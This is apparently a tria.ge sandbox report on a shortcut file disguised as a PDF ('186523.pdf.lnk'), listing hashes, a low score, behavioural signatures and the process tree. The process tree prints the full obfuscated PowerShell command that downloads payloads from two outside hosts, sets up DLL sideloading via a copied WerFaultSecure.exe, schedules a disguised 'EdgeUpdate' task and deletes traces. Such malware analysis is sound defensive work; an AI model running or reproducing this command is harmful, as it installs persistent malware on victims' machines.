Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    19/09/2024, 05:42

General

  • Target

    186523.pdf.lnk

  • Size

    3KB

  • MD5

    7007778e4e8c98c94d20b0243b7743f1

  • SHA1

    c771ee88e3951e337a26ebfdcfc1218d414dbdad

  • SHA256

    d7b278d20f47203da07c33f646844e74cb690ed802f2ba27a74e216368df7db9

  • SHA512

    25f21b662a55b64818b70d593b680bd3e1e05dbf0ee018cbd3912327006e0d5334df5552e9e469afe01797c3e00fc4c65aefbe45bce943d1944642babee87fcf

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\186523.pdf.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2532
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" powershell $ProgressPreference = 'SilentlyContinue';i''w''r https://jihang.scapematic.info/eqhgrh/uybvjxosg -OutFile C:\ProgramData\186523.pdf;s''a''p''s C:\ProgramData\186523.pdf;i''w''r https://shianchi.scapematic.info/jhgfd/jkhxvcf -OutFile "C:\ProgramData\hal";r''e''n -Path "C:\ProgramData\hal" -NewName "C:\ProgramData\wer.dll";c''p C:\Windows\System32\WerFaultSecure.exe C:\ProgramData\WerFaultSecure.exe;c''p''i 'C:\ProgramData\186523.pdf' -destination .;sch''ta''s''ks /c''r''e''a''te /S''c minute /T''n EdgeUpdate /t''r 'C:\ProgramData\WerFaultSecure' /f;e''r''a''s''e *d?.?n?
      2⤵
        PID:2488

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads